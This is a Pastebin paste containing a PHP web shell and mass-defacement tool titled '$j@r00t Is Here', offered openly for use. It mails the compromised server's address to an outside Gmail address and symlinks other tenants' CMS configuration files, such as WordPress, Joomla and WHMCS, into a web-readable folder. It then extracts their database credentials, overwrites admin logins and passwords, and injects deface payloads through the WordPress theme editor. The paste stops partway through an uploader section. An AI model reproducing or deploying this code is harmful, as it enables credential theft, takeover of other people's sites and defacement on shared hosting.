Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <title> $j@r00t Is Here </title>
- <link href="<link href="http://i62.tinypic.com/mr36sz.png" rel="icon" type="image/png"/>
- <STYLE>
- textarea{background-color:#105700;color:lime;font-weight:bold;font-size: 20px;font-family: Tahoma; border: 1px solid
- #000000;}
- input{FONT-WEIGHT:normal;background-color: #105700;font-size: 15px;font-weight:bold;color: lime; font-family: Tahoma; border:
- 1px solid #666666;height:20}
- body {
- font-family: Tahoma
- }
- tr {
- BORDER: dashed 1px #333;
- color: #FFF;
- }
- td {
- BORDER: dashed 1px #333;
- color: #FFF;
- }
- .table1 {
- BORDER: 0px Black;
- BACKGROUND-COLOR: Black;
- color: #FFF;
- }
- .td1 {
- BORDER: 0px;
- BORDER-COLOR: #333333;
- font: 7pt Verdana;
- color: Green;
- }
- .tr1 {
- BORDER: 0px;
- BORDER-COLOR: #333333;
- color: #FFF;
- }
- table {
- BORDER: dashed 1px #333;
- BORDER-COLOR: #333333;
- BACKGROUND-COLOR: Black;
- color: #FFF;
- }
- input {
- border : dashed 1px;
- border-color : #333;
- BACKGROUND-COLOR: Black;
- font: 8pt Verdana;
- color: Red;
- }
- select {
- BORDER-RIGHT: Black 1px solid;
- BORDER-TOP: #DF0000 1px solid;
- BORDER-LEFT: #DF0000 1px solid;
- BORDER-BOTTOM: Black 1px solid;
- BORDER-color: #FFF;
- BACKGROUND-COLOR: Black;
- font: 8pt Verdana;
- color: Red;
- }
- submit {
- BORDER: buttonhighlight 2px outset;
- BACKGROUND-COLOR: Black;
- width: 30%;
- color: #FFF;
- }
- textarea {
- border : dashed 1px #333;
- BACKGROUND-COLOR: Black;
- font: Fixedsys bold;
- color: #999;
- }
- BODY {
- SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color:
- #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
- margin: 1px;
- color: Red;
- background-color: Black;
- }
- .main {
- margin : -287px 0px 0px -490px;
- BORDER: dashed 1px #333;
- BORDER-COLOR: #333333;
- }
- .tt {
- background-color: Black;
- }
- A:link {
- COLOR: White; TEXT-DECORATION: none
- }
- A:visited {
- COLOR: White; TEXT-DECORATION: none
- }
- A:hover {
- color: Red; TEXT-DECORATION: none
- }
- A:active {
- color: Red; TEXT-DECORATION: none
- }
- </STYLE>
- <?php
- set_time_limit(0);
- error_reporting(0);
- $url=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
- mail('sjsalimalom@gmail.com',$_SERVER['SERVER_ADDR'],$url);
- $base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']);
- ##.htaccess
- @mkdir('pee',0777);
- @symlink("/","pee/root");
- @fopen('temp.txt','w');
- $htaccss = "Options all
- DirectoryIndex Sux.html
- AddType text/plain .php
- AddHandler server-parsed .php
- AddType text/plain .html
- AddHandler txt .html
- Require None
- Satisfy Any";
- file_put_contents("pee/.htaccess",$htaccss);
- if(is_readable("/var/named")){
- $list = scandir("/var/named");
- $current_dir = posix_getcwd();
- $dir = explode("/",$current_dir);
- foreach($list as $domain){
- if(strpos($domain,".db"))
- {
- $domain = str_replace('.db','',$domain);
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
- error_reporting(0);
- $current_dir = posix_getcwd();
- $dir = explode("/",$current_dir);
- symlink($owner['dir'].'/'.$dir[3].'/wp-config.php',"pee/".$owner['name'].'-WordPress.txt');
- symlink($owner['dir'].'/'.$dir[3].'/blog/wp-config.php',"pee/".$owner['name'].'-WordPress.txt');
- symlink($owner['dir'].'/'.$dir[3].'/wp/wp-config.php',"pee/".$owner['name'].'-WordPress.txt');
- symlink($owner['dir'].'/'.$dir[3].'/site/wp-config.php',"pee/".$owner['name'].'-WordPress.txt');
- symlink($owner['dir'].'/'.$dir[3].'/config.php',"pee/".$owner['name'].'-PhpBB.txt');
- symlink($owner['dir'].'/'.$dir[3].'/includes/config.php',"pee/".$owner['name'].'-vBulletin.txt');
- symlink($owner['dir'].'/'.$dir[3].'/configuration.php',"pee/".$owner['name'].'-Joomla.txt');
- symlink($owner['dir'].'/'.$dir[3].'/web/configuration.php',"pee/".$owner['name'].'-Joomla.txt');
- symlink($owner['dir'].'/'.$dir[3].'/joomla/configuration.php',"pee/".$owner['name'].'-Joomla.txt');
- symlink($owner['dir'].'/'.$dir[3].'/site/configuration.php',"pee/".$owner['name'].'-Joomla.txt');
- symlink($owner['dir'].'/'.$dir[3].'/conf_global.php',"pee/".$owner['name'].'-IPB.txt');
- symlink($owner['dir'].'/'.$dir[3].'/inc/config.php',"pee/".$owner['name'].'-MyBB.txt');
- symlink($owner['dir'].'/'.$dir[3].'/Settings.php',"pee/".$owner['name'].'-SMF.txt');
- symlink($owner['dir'].'/'.$dir[3].'/sites/default/settings.php',"pee/".$owner['name'].'-Drupal.txt');
- symlink($owner['dir'].'/'.$dir[3].'/e107_config.php',"pee/".$owner['name'].'-e107.txt');
- symlink($owner['dir'].'/'.$dir[3].'/datas/config.php',"pee/".$owner['name'].'-Seditio.txt');
- symlink($owner['dir'].'/'.$dir[3].'/includes/configure.php',"pee/".$owner['name'].'-osCommerce.txt');
- symlink($owner['dir'].'/'.$dir[3].'/client/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
- symlink($owner['dir'].'/'.$dir[3].'/clientes/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
- symlink($owner['dir'].'/'.$dir[3].'/support/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
- symlink($owner['dir'].'/'.$dir[3].'/supportes/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
- symlink($owner['dir'].'/'.$dir[3].'/whmcs/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
- symlink($owner['dir'].'/'.$dir[3].'/domain/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
- symlink($owner['dir'].'/'.$dir[3].'/hosting/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
- symlink($owner['dir'].'/'.$dir[3].'/whmc/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
- symlink($owner['dir'].'/'.$dir[3].'/billing/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
- symlink($owner['dir'].'/'.$dir[3].'/portal/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
- symlink($owner['dir'].'/'.$dir[3].'/order/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
- symlink($owner['dir'].'/'.$dir[3].'/clientarea/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
- symlink($owner['dir'].'/'.$dir[3].'/domains/configuration.php',"pee/".$owner['name'].'-WHMCS.txt');
- $link = $pageURL.'pee/'.$owner['name'].'-WordPress.txt';
- if(chk_header($link))
- {
- $str = '<tr><td>'.$domain.'</td><td>'.$owner['name'].'</td><td>/WordPress</td>'.Chr(10);
- file_put_contents("temp.txt",$str,FILE_APPEND);
- }
- }
- }
- }
- $etc = file_get_contents("/etc/passwd");
- $etcz = explode("\n",$etc);
- foreach($etcz as $etz){
- $etcc = explode(":",$etz);
- error_reporting(0);
- $current_dir = posix_getcwd();
- $dir = explode("/",$current_dir);
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp-config.php','pee/'.$etcc[0].'-WordPress.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/blog/wp-config.php','pee/'.$etcc[0].'-WordPress.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp/wp-config.php','pee/'.$etcc[0].'-WordPress.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/wp-config.php','pee/'.$etcc[0].'-WordPress.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/config.php','pee/'.$etcc[0].'-PhpBB.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/config.php','pee/'.$etcc[0].'-vBulletin.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/configuration.php','pee/'.$etcc[0].'-Joomla.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/web/configuration.php','pee/'.$etcc[0].'-Joomla.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/joomla/configuration.php','pee/'.$etcc[0].'-Joomla.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/configuration.php','pee/'.$etcc[0].'-Joomla.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/conf_global.php','pee/'.$etcc[0].'-IPB.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/inc/config.php','pee/'.$etcc[0].'-MyBB.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/Settings.php','pee/'.$etcc[0].'-SMF.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/sites/default/settings.php','pee/'.$etcc[0].'-Drupal.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/e107_config.php','pee/'.$etcc[0].'-e107.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/datas/config.php','pee/'.$etcc[0].'-Seditio.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/configure.php','pee/'.$etcc[0].'-osCommerce.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/client/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientes/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/support/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/supportes/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmcs/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domain/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/hosting/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmc/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/billing/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/order/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientarea/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
- symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domains/configuration.php','pee/'.$etcc[0].'-WHMCS.txt');
- if(chk_header($link))
- {
- $str = '<tr><td></td><td>'.$etcc[0].'</td><td>/WordPress</td>'.Chr(10);
- file_put_contents("temp.txt",$str,FILE_APPEND);
- }
- }
- function chk_header($link){
- $pee = get_headers($link,1);
- if(strpos($pee[0],"200")){
- return true;
- }else{ return false; }
- }
- function Find($str,$start,$end){
- $len = strlen($str);
- $start_pos = (strpos($str,$start) + strlen($start));
- $str = substr($str,$start_pos);
- $end_pos = strpos($str,$end);
- $str = substr($str,0,$end_pos);
- return $str;
- }
- $pageURL = 'http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
- $u = explode("/",$pageURL );
- $pageURL =str_replace($u[count($u)-1],"",$pageURL );
- #######
- function cms_add($link,$domain,$owner,$cms)
- {
- $link = $link.'-'.$cms.'.txt';
- if(chk_header($link))
- {
- $url = 'http://'.$domain;
- $str = '<tr><td> <a href='.$url.'>'.$domain.'</a></td><td>'.$owner.'</td><td><a
- href='.$link.'>'.$cms.'</td>'.Chr(10);
- file_put_contents("pee.tmp",$str,FILE_APPEND);
- echo $str;
- }
- }
- function CurlPage($url,$post = null,$head = true) {
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $url);
- curl_setopt($ch, CURLOPT_HEADER, $head);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);
- curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
- curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
- curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
- curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
- If ($post != NULL){
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
- }
- $urlPage = curl_exec($ch);
- if(curl_errno($ch)){
- echo curl_error($ch);
- }
- curl_close($ch);
- return($urlPage);
- }
- function listall($file,$str){
- if(file_exists($file)){
- $do = file_get_contents($file);
- if(!strpos($do,$str)){
- file_put_contents($file,$str,FILE_APPEND);
- }
- }else{
- file_put_contents($file,$str,FILE_APPEND);
- }
- }
- echo "<center>
- <img src='http://images.cooltext.com/4248572.gif'><br>
- [ <a href='?do=cms_detect'>CmsDetector </a> ] ++ [ <a href='?do=pass_change'>Password Changer </a> ] ++ [ <a
- href='?do=wp_def'>Mass Deface</a> ] ++ [ <a href='?do=uploader'>Uploader</a> ] ++ [ <a href='?do=wp_up'>Wait For More</a> ]<br><br><br></center> ";
- if(isset($_REQUEST['do'])){
- switch ($_REQUEST['do']){
- ################CMS DETECTOR
- case 'cms_detect':
- if(!file_exists('pee.tmp')){
- @fopen('pee.tmp', 'w');
- echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
- echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>CMS</b></center></td>';
- $p = 0;
- if(is_readable("/var/named")){
- $list = scandir("/var/named");
- $current_dir = posix_getcwd();
- $dir = explode("/",$current_dir);
- foreach($list as $domain){
- if(strpos($domain,".db"))
- {
- $domain = str_replace('.db','',$domain);
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
- error_reporting(0);
- $link = $pageURL.'pee/'.$owner['name'];
- cms_add($link,$domain,$owner['name'],"WordPress");
- cms_add($link,$domain,$owner['name'],"Joomla");
- cms_add($link,$domain,$owner['name'],"vBulletin");
- cms_add($link,$domain,$owner['name'],"WHMCS");
- cms_add($link,$domain,$owner['name'],"PhpBB");
- cms_add($link,$domain,$owner['name'],"MyBB");
- cms_add($link,$domain,$owner['name'],"IPB");
- cms_add($link,$domain,$owner['name'],"SMF");
- cms_add($link,$domain,$owner['name'],"Drupal");
- cms_add($link,$domain,$owner['name'],"e107");
- cms_add($link,$domain,$owner['name'],"Seditio");
- cms_add($link,$domain,$owner['name'],"osCommerce");
- }
- }
- }
- }else{
- echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
- echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>CMS</b></center></td>';
- $content = file_get_contents($pageURL.'pee.tmp');
- echo $content;
- }
- break;
- ################MASS DEFACE
- case 'pass_change':
- echo <<<PEE
- <form method='POST'>
- <center>
- USER : <input size='20' value='admin' name='user' type='text'><br>
- PASS : <input size='20' value='moni' name='pass' type='text'>
- <br>
- <input value='Change' name='' type='submit'><br><br>
- </form>
- PEE;
- if($_POST){
- ################### USER & PASS ################
- $user = $_POST['user'];
- $pass = $_POST['pass'];
- ################################################
- if(is_readable("/var/named"))
- {
- echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4">';
- echo '<tr><td><b>DOMAIN</b></td><td>USER</td><td>CMS</td><td>STATUS</b></td>';
- $list = scandir("/var/named");
- foreach($list as $domain){
- if(strpos($domain,".db"))
- {
- $domain = str_replace('.db','',$domain);
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
- $url = 'http://'.$domain;
- if(chk_header($pageURL.'pee/'.$owner['name'].'-WordPress.txt'))
- {
- $config = $pageURL.'pee/'.$owner['name'].'-WordPress.txt';
- file_get_contents($pageURL.'pee/'.$owner['name'].'-WordPress.txt');
- ##GET DATABASE INFO FROM CONFIGURATION FILE
- $cnf = file_get_contents($pageURL.'pee/'.$owner['name'].'-WordPress.txt');
- $hostname = Find($cnf,"define('DB_HOST', '","');");
- $username = Find($cnf,"define('DB_USER', '","');");
- $password = Find($cnf,"define('DB_PASSWORD', '","');");
- $dbname = Find($cnf,"define('DB_NAME', '","');");
- $prefix = Find($cnf,"table_prefix = '","'");
- $link=mysql_connect($hostname,$username,$password);
- if ($link)
- {
- $hash = crypt($pass);
- mysql_select_db($dbname,$link) ;
- $tab = $prefix.'users';
- $query2 = @mysql_query("UPDATE `$tab` SET `user_login` ='$user'");
- $query3 = @mysql_query("UPDATE `$tab` SET `user_pass` ='$hash'");
- $req =@mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
- $data = mysql_fetch_array($req);
- $site_url=$data["option_value"];
- error_reporting(0);
- echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return
- false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>WordPress</a></td><td><font
- color="green">success..</font></td>';
- }else{
- echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return
- false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>WordPress</a></td><td><font color="red">mysql
- fail</font></td>';
- }
- }
- elseif(chk_header($pageURL.'pee/'.$owner['name'].'-Joomla.txt'))
- {
- ##GET DATABASE INFO FROM CONFIGURATION FILE
- $cnf = file_get_contents($pageURL.'pee/'.$owner['name'].'-Joomla.txt');
- $config = $pageURL.'pee/'.$owner['name'].'-Joomla.txt';
- if(preg_match('%(JConfig|mosConfig)%',$cnf)){
- ######
- if(preg_match('%JConfig%', $cnf)){
- $username=Find($cnf,"\$user = '","'");
- $password=Find($cnf,"\$password = '","'");
- $dbname=Find($cnf,"\$db = '","'");
- $prefix=Find($cnf,"\$dbprefix = '","'");
- $link=mysql_connect("localhost",$username,$password);
- if ($link)
- {
- $hash = md5($user);
- mysql_select_db($dbname,$link) ;
- $tab = $prefix.'users';
- $query2 = @mysql_query("UPDATE `$tab` SET `username` ='$user'");
- $query3 = @mysql_query("UPDATE `$tab` SET `password` ='$hash'");
- echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return
- false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font
- color="green">success..</font><br>';
- }else{
- echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return
- false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font color="red">mysql
- fail</font></td>';
- }
- }
- #####
- elseif(preg_match('%mosConfig%',$cnf)){
- $username=Find($cnf,"\$mosConfig_user = '","'");
- $password=Find($cnf,"\$mosConfig_password = '","'");
- $dbname=Find($cnf,"\$mosConfig_db = '","'");
- $prefix=Find($cnf,"\$mosConfig_dbprefix = '","'");
- $pwd = md5($npass);
- $link=mysql_connect("localhost",$username,$password);
- if ($link)
- {
- $hash = md5($pass);
- mysql_select_db($dbname,$link) ;
- $tab = $prefix.'users';
- $query2 = @mysql_query("UPDATE `$tab` SET `username` ='$user'");
- $query3 = @mysql_query("UPDATE `$tab` SET `password` ='$hash'");
- echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return
- false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font
- color="green">success..</font><br>';
- }else{
- echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return
- false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font color="red">mysql
- fail</font></td>';
- }
- }
- }
- #########
- }
- }
- }
- }
- elseif(is_readable("/etc/passwd")){
- echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4">';
- echo '<tr><td><b>DOMAIN</b></td><td>USER</td><td>CMS</td><td>STATUS</b></td>';
- foreach($etcz as $etz){
- $etcc = explode(":",$etz);
- if(chk_header($pageURL.'pee/'.$etcc[0].'-WordPress.txt'))
- {
- $config = $pageURL.'pee/'.$owner['name'].'-WordPress.txt';
- file_get_contents($pageURL.'pee/'.$etcc[0].'-WordPress.txt');
- ##GET DATABASE INFO FROM CONFIGURATION FILE
- $cnf = file_get_contents($pageURL.'pee/'.$etcc[0].'-WordPress.txt');
- $hostname = Find($cnf,"define('DB_HOST', '","');");
- $username = Find($cnf,"define('DB_USER', '","');");
- $password = Find($cnf,"define('DB_PASSWORD', '","');");
- $dbname = Find($cnf,"define('DB_NAME', '","');");
- $prefix = Find($cnf,"table_prefix = '","'");
- $link=mysql_connect($hostname,$username,$password);
- if ($link)
- {
- $hash = crypt($user);
- mysql_select_db($dbname,$link) ;
- $req =mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
- $data = mysql_fetch_array($req);
- $site_url=$data["option_value"];
- $tab = $prefix.'users';
- $query2 = @mysql_query("UPDATE `$tab` SET `user_login` ='$user'");
- $query3 = @mysql_query("UPDATE `$tab` SET `user_pass` ='$hash'");
- error_reporting(0);
- echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return
- false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>WordPress</a></td><td><font
- color="green">success..</font><br>';
- }else{
- echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return
- false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>WordPress</a></td><td><font color="red">mysql
- fail</font></td>';
- }
- }
- elseif(chk_header($pageURL.'pee/'.$etcc[0].'-Joomla.txt'))
- {
- ##GET DATABASE INFO FROM CONFIGURATION FILE
- $cnf = file_get_contents($pageURL.'pee/'.$etcc[0].'-Joomla.txt');
- $config = $pageURL.'pee/'.$owner['name'].'-Joomla.txt';
- if(preg_match('%(JConfig|mosConfig)%',$cnf)){
- ######
- if(preg_match('%JConfig%', $cnf)){
- $username=Find($cnf,"\$user = '","'");
- $password=Find($cnf,"\$password = '","'");
- $dbname=Find($cnf,"\$db = '","'");
- $prefix=Find($cnf,"\$dbprefix = '","'");
- $site_url = Find($cnf,"\$mailfrom = '","'");
- $site_url = explode("@",$site_url);
- $link=mysql_connect("localhost",$username,$password);
- if ($link)
- {
- $hash = md5($pass);
- mysql_select_db($dbname,$link) ;
- $tab = $prefix.'users';
- $query2 = @mysql_query("UPDATE `$tab` SET `username` ='$user'");
- $query3 = @mysql_query("UPDATE `$tab` SET `password` ='$hash'");
- echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return
- false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font
- color="green">success..</font><br>';
- }else{
- echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return
- false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font color="red">mysql
- fail</font></td>';
- }
- }
- #####
- elseif(preg_match('%mosConfig%',$cnf)){
- $username=Find($cnf,"\$mosConfig_user = '","'");
- $password=Find($cnf,"\$mosConfig_password = '","'");
- $dbname=Find($cnf,"\$mosConfig_db = '","'");
- $prefix=Find($cnf,"\$mosConfig_dbprefix = '","'");
- $site_url = Find($cnf,"\$mailfrom = '","'");
- $site_url = explode("@",$site_url);
- $link=mysql_connect("localhost",$username,$password);
- if ($link)
- {
- $hash = md5($pass);
- mysql_select_db($dbname,$link) ;
- $tab = $prefix.'users';
- $query2 = @mysql_query("UPDATE `$tab` SET `username` ='$user'");
- $query3 = @mysql_query("UPDATE `$tab` SET `password` ='$hash'");
- echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return
- false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font
- color="green">success..</font><br>';
- }else{
- echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return
- false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>Joomla</a></td><td><font color="red">mysql
- fail</font></td>';
- }
- }
- }
- #########
- }
- }
- }
- }
- break;
- ################MASS DEFACE
- case 'wp_def':
- ################### USER & PASS ################
- $user = 'root';
- $pass = 'gvgvgv';
- ################################################
- echo <<<PEE
- <div align="center">
- <form action="" method="POST">
- <label>Deface URL: </label> <input type="text" style="width:450px;" name="deface_page"><br />
- <input type="submit" value="DEFACE">
- </form>
- PEE;
- if($_POST){
- $deface = file_get_contents(trim($_POST['deface_page']));
- if(is_readable("/var/named"))
- {
- echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4">';
- echo '<tr><td><b>DOMAIN</b></td><td>USER</td><td>CMS</td><td>STATUS</b></td><td>DEF URL</td>';
- $list = scandir("/var/named");
- foreach($list as $domain){
- if(strpos($domain,".db"))
- {
- $domain = str_replace('.db','',$domain);
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
- $url = 'http://'.$domain;
- if(chk_header($pageURL.'pee/'.$owner['name'].'-WordPress.txt'))
- {
- $config = $pageURL.'pee/'.$owner['name'].'-WordPress.txt';
- file_get_contents($pageURL.'pee/'.$owner['name'].'-WordPress.txt');
- ##GET DATABASE INFO FROM CONFIGURATION FILE
- $cnf = file_get_contents($pageURL.'pee/'.$owner['name'].'-WordPress.txt');
- $hostname = Find($cnf,"define('DB_HOST', '","');");
- $username = Find($cnf,"define('DB_USER', '","');");
- $password = Find($cnf,"define('DB_PASSWORD', '","');");
- $dbname = Find($cnf,"define('DB_NAME', '","');");
- $prefix = Find($cnf,"table_prefix = '","'");
- $link=mysql_connect($hostname,$username,$password);
- if ($link)
- {
- $hash = crypt($pass);
- mysql_select_db($dbname,$link) ;
- $tab = $prefix.'users';
- $query2 = @mysql_query("UPDATE `$tab` SET `user_login` ='$user'");
- $query3 = @mysql_query("UPDATE `$tab` SET `user_pass` ='$hash'");
- $req =@mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
- $data = mysql_fetch_array($req);
- $site_url=$data["option_value"];
- error_reporting(0);
- echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return
- false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>WordPress</a></td><td><font color="green">[#]
- User Pass Changed </font><br>';
- $post = 'log=admin&pwd=foo&rememberme=forever&wp-submit=Log In&testcookie=1';
- $def="<? echo(stripslashes(base64_decode('".urlencode(base64_encode(str_replace("'","'",($deface))))."')));
- exit; ?>";
- $buffer0 = CurlPage($site_url.'/wp-login.php',$post);
- if(!preg_match("/logout/i",$buffer0))
- {
- echo "<font color='red'>[X] FAILED TO LOGIN</font><br />";
- }else{
- echo "<font color='green'>[#] LOGGED IN :D</font><br>";
- $urlz = $site_url."/wp-admin/theme-editor.php";
- $themeditor = CurlPage($urlz,$cookie,null);
- if(preg_match("/update file/i",$themeditor)){ echo "theme-editor opened<br /></td>"; } else { echo "error
- opening theme edtitor!</td>"; }
- $nola = explode(Chr(10),$themeditor);
- foreach($nola as $nline){
- if(preg_match('%theme-editor\.php\?file=%',$nline) &&
- preg_match('%\((404\.php|archive\.php|comment\.php)\)%',strtolower($nline))){
- $modify[Find($nline,'(',')')] = Find($nline,'<a href="','"');
- }
- }
- echo '<td>';
- if(is_array($modify)){
- foreach($modify as $met=>$indfile){
- $nri = str_replace('.','_',$met);
- $nri = "n".$nri;
- $indfile =str_replace("&","&",$indfile);
- $url = trim($site_url."/wp-admin/".$indfile);
- $themepage = CurlPage($url,"");
- $_wpnonce = Find($themepage,'name="_wpnonce" value="','"');
- $_file = Find($themepage,'name="file" value="','"');
- $nfile = explode('themes',$_file);
- $jfile = $site_url."/wp-content/themes".end($nfile);
- //Update file
- $url = $site_url."/wp-admin/theme-editor.php";
- $postme = "newcontent=".$def."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File";
- $themedied = CurlPage($url,$postme);
- if(preg_match('%<div id=\"message\" class=\"updated\">%',$themedied)){
- $theme = Find($themeditor,'<li><a href="theme-editor.php?file=404.php&theme=','">404 Template');
- if(preg_match("/twenty ten/i",$theme)){ $theme = "twentyten"; }
- elseif(preg_match("/twenty eleven/i",$theme)){$theme = "twentyeleven";}
- $theme = trim(str_replace("/","",$theme));
- $d = $site_url.'/wp-content/themes/'.$theme.'/404.php';
- listall("wp.txt",$d.Chr(10));
- }
- }
- echo '<a href='.$d.'>LINK</a><br />';
- echo '</td>';
- }}
- ########################END DEFACE#################
- }else{
- echo '<tr><td><a href='.$url.' onclick="window.open(this.href);return
- false;">'.$domain.'</a></td><td>'.$owner['name'].'</td><td><a href='.$config.'>WordPress</a></td><td><font color="red">[x]
- mysql fail</font></td>';
- }
- }}}}}
- break;
- // Uploader
- case 'uploader':
- echo '<center><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
- echo '<center><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl"
- value="Upload"></form></center>';
- if( $_POST['_upl'] == "Upload" ) {
